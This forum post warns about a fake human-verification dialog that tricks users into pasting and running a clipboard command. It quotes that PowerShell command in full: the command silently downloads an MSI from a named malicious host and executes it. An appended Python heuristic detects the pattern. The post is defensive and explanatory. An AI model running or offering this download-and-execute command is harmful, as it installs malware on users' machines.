by RobIII
481 days ago
Interesting bit starts around 0:32 (ain't nobody got time for this, right?)

This shows how malware pops up a dialog to "verify you are human"; something we've all seen in various different permutations. Sometimes we need to click all stoplights, sometimes we need to do a simple math problem or decipher hard-to-read text. This time you're being asked to enter a key combination (Win+R, then CTRL+V, then Enter) which will paste a command that downloads and installs malware. The command has been sneakily put on the clipboard just earlier by the website.

The command (DON'T RUN THIS) is as follows:

  cmd /c start /min powershell -NoProfile -WindowStyle Hidden -Command $path='c:\\users\\public\\3aw.msi'; Invoke-RestMethod -Uri 'https:\\qq51f.short.gy/1' -OutFile $path; Start-Process $path;

This downloads malware from https:\\qq51f.short.gy/1 which redirects to https:\\bestiamos.com/91.brr which is then saved as c:\users\public\3aw.msi and run. (URLs are made invalid by replacing // with \\ deliberately.)

First mention I could find was Feb. 18th: https://any.run/report/e9af23d9fde13156ade19368fd8c2766fe8f1...

Maybe this is as old as Rome, but for me it's a first.
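Added example, not part of RobIII's post: a small Python heuristic a defender could run over process-creation command lines to flag the download-and-run pattern in the command quoted above. The indicator names, the two benign sample lines and the decision rule are assumptions made for illustration.

```python
import re

# Weak signals taken from the command quoted in the post; the combination matters.
INDICATORS = {
    "hidden_window": re.compile(r"-w\w*\s+hidden\b|\bstart\s+/min\b", re.I),
    "no_profile": re.compile(r"-nop\w*", re.I),
    "web_download": re.compile(r"\b(invoke-restmethod|invoke-webrequest|irm|iwr)\b", re.I),
    "writes_file": re.compile(r"-outfile\b", re.I),
    "runs_payload": re.compile(r"\bstart-process\b", re.I),
    # One or more backslashes, since logs and pastes differ in escaping.
    "public_dir": re.compile(r"\\+users\\+public\\+", re.I),
}

SAMPLES = {
    # Verbatim from the post, URL still defanged (\\ instead of //).
    "post_command": (
        r"cmd /c start /min powershell -NoProfile -WindowStyle Hidden -Command "
        r"$path='c:\\users\\public\\3aw.msi'; "
        r"Invoke-RestMethod -Uri 'https:\\qq51f.short.gy/1' -OutFile $path; "
        r"Start-Process $path;"
    ),
    # Constructed benign examples for contrast.
    "health_check": "powershell -NoProfile -Command Invoke-RestMethod -Uri 'https://intranet.example/health'",
    "minimized_app": "cmd /c start /min notepad.exe",
}


def matched_indicators(cmdline):
    """Return the sorted names of all indicators found in one command line."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(cmdline))


def is_paste_and_run_lure(cmdline):
    """Flag a command that downloads and executes a file while hiding itself."""
    hits = set(matched_indicators(cmdline))
    fetch_and_run = {"web_download", "runs_payload"} <= hits
    concealed = bool(hits & {"hidden_window", "public_dir"})
    return fetch_and_run and concealed


if __name__ == "__main__":
    for name, cmdline in SAMPLES.items():
        verdict = "ALERT" if is_paste_and_run_lure(cmdline) else "ok"
        print(f"{verdict:5} {name}: {matched_indicators(cmdline)}")
```

Each indicator alone is common in legitimate administration, so the rule only fires when fetching, executing and concealment appear in the same command line.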